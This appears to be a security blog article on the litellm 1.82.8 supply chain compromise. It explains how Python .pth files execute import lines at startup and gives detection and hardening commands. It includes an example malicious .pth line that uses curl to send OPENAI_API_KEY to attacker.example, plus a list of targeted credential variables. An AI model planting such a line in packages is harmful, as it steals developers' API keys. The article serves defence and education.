· 6 min read ·

The .pth File Trick: Why the litellm Supply Chain Attack Targeted the Right Ecosystem

Source: simonwillison

When Simon Willison flagged the discovery of a malicious file called litellm_init.pth embedded in litellm 1.82.8, the immediate story was straightforward: a supply chain attack, a compromised PyPI release, credentials at risk. But the method is worth examining in detail, because .pth files are one of Python’s most underappreciated attack surfaces, and the choice of litellm as a vehicle was not coincidental.

What .pth Files Actually Do

Most Python developers know .pth files exist in the abstract. Fewer understand what they actually do at runtime, which is precisely what makes them dangerous.

When Python starts up, the site module runs automatically. Its job is to configure sys.path by processing every .pth file it finds in the site-packages directory. For most lines in a .pth file, the behavior is simple: each line is treated as a path to add to sys.path. But there is a second behavior that is documented, rarely discussed, and frequently forgotten:

If a line starts with import, it is executed.

That is the entire rule. Any .pth file that ships with a package, when that package is installed into a Python environment, can execute arbitrary code at Python startup, before main() runs, before any user code loads, and regardless of whether the package is ever imported.

Here is a minimal example of what this looks like in a malicious .pth file:

import os; os.system('curl -s https://attacker.example/collect?k=' + os.environ.get('OPENAI_API_KEY', ''))

Every Python process started in that environment, by any user sharing that environment, executes this line. There is no import guard, no conditional, no way for a developer to “not use” the package to avoid triggering it. Installing the package is sufficient.

The litellm_init.pth File

The file included in litellm 1.82.8 followed exactly this pattern. Named litellm_init.pth, it was placed in the package’s installed files so that it would land in site-packages alongside the legitimate litellm code. The naming was deliberate: litellm_init looks like a legitimate initialization module for the package, not an anomaly.

Credential stealers distributed through this mechanism typically target environment variables first, since that is where most developers and deployment systems store API keys. For a package like litellm, the list of interesting environment variables is long:

OPENAI_API_KEY
ANTHROPIC_API_KEY
AZURE_OPENAI_API_KEY
COHERE_API_KEY
HUGGINGFACE_API_TOKEN
AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY
GOOGLE_API_KEY
MISTRAL_API_KEY

litellm’s value proposition, a unified interface to over 100 LLM providers, means that its users are more likely than almost any other developer population to have multiple high-value API keys present in the same environment simultaneously. A developer building a routing layer over several LLM providers might have credentials for five or six services loaded in their shell profile. A CI/CD pipeline using litellm for evaluation runs might have keys for even more. The credential surface is unusually wide.

Why This Attack Vector Persists

The .pth file technique is not new. Security researchers have documented it for years. The colourama typosquatting attack in 2019 used a similar mechanism in a different ecosystem. The 2022 ctx package compromise on PyPI used environment variable exfiltration targeting AWS credentials. The specific trick of abusing .pth files for arbitrary code execution at startup has been a documented concern since at least 2019.

The reason it keeps appearing is that the attack surface is structural. Python’s site module behavior is not a bug; it is documented functionality intended to allow packages to extend the Python path at install time. The Python documentation describes the import line execution behavior explicitly. Removing it would break legitimate packages that rely on it.

PyPI’s malware scanning, which Socket.dev and similar tools have helped improve substantially, does catch many of these attacks. But detection happens after a version is published, and the window between publication and takedown is enough for automated pip install runs, CI pipelines, and developer machines to pull the compromised package.

The Broader PyPI Supply Chain Problem

Python’s package ecosystem has structural properties that make supply chain attacks both lucrative and difficult to fully prevent.

Package maintainers on PyPI authenticate using API tokens, and those tokens can be compromised through phishing, credential reuse, or malware on the maintainer’s own machine. The PyPI incident database shows a consistent pattern: account takeovers followed by malicious releases that persist for hours before being noticed.

Two-factor authentication is now required for critical packages on PyPI, a policy that rolled out in 2023, but “critical” is defined by download thresholds and the definition excludes many packages that are critical in practice for specific developer communities. litellm’s user base, while large, skews toward AI application developers rather than being a foundational package for the entire Python ecosystem, which may have delayed its classification.

Trusted publishing, where packages authenticate to PyPI via GitHub Actions OIDC rather than long-lived tokens, significantly reduces the account takeover risk. The PyPI Trusted Publishers system has been available since 2023 and eliminates the static token that can be stolen from a developer’s machine or environment. Adoption is growing but uneven across the ecosystem.

Detecting This Class of Attack

For developers who want to inspect packages before or after installation, a few approaches work well.

Inspecting package contents before installing is the most reliable approach. pip download retrieves a package without installing it:

pip download litellm==1.82.8 --no-deps -d ./tmp
cd ./tmp
unzip litellm-1.82.8-py3-none-any.whl
find . -name '*.pth'

Any .pth files discovered this way deserve immediate inspection. Legitimate .pth files in packages are uncommon and almost always contain only path entries, never import statements.

pip-audit checks installed packages against known vulnerability databases, though supply chain attacks often do not have CVE entries in time to be useful. Socket.dev’s CLI performs more behavioral analysis and specifically flags packages that contain installation-time code execution, including .pth file abuse.

For organizations running Python in CI or production environments, pinning to a lock file generated from a known-good state and verifying package hashes provides meaningful protection:

pip install --require-hashes -r requirements.txt

This ensures that even if a malicious version is published, it will not be installed into environments that pin and verify hashes, because the hash will not match the locked value.

The AI Tooling Ecosystem as a Target

This incident fits a pattern that has been developing over the past two years. As AI application development has grown into a mainstream software practice, the packages that underpin it, libraries like litellm, langchain, openai, anthropic, and their dependencies, have become high-value targets.

The reason is straightforward: developers working with these libraries carry credentials that have direct monetary value. An OpenAI API key with a high rate limit can be abused for prompt spam, resale of API access, or training data collection at scale. AWS credentials associated with Bedrock access can generate significant cloud bills. Anthropic API keys are increasingly valuable as Claude models are used in production systems.

The credential surface is also wider than in traditional software development. A developer building a web application might expose a database password or a payment processor key. A developer building an AI application might have ten or fifteen active API keys from different providers, all present in their shell environment simultaneously because litellm and similar libraries encourage configuring multiple providers for fallback and cost optimization.

This is not an argument against using unified LLM clients. It is an argument for treating the packages that handle this credential surface with the same scrutiny applied to security-critical libraries, and for using environment isolation, credential management tools like 1Password CLI or Doppler, and per-project virtual environments that limit the blast radius of a compromised package in any single environment.

What to Do Now

If you have litellm installed and are unsure which version, check immediately:

pip show litellm

If you have 1.82.8 installed, upgrade to a clean version and consider rotating any API keys that were present in your environment during the period when that version was installed. Credential rotation is cheap compared to the cost of unauthorized API usage.

For the broader question of supply chain hygiene in AI development, the litellm incident is a useful prompt to audit .pth files across your Python environments:

find $(python -c "import site; print(' '.join(site.getsitepackages()))") -name '*.pth' -exec grep -l 'import' {} \;

This lists any .pth files in your site-packages that contain import statements. Most environments will return nothing. If something turns up, inspect it.

The supply chain problem in Python is structural and ongoing. The .pth file attack vector is one piece of it, not the whole picture. But it is a particularly quiet piece, and this incident is a good reason to understand how it works before the next one surfaces.

Was this interesting?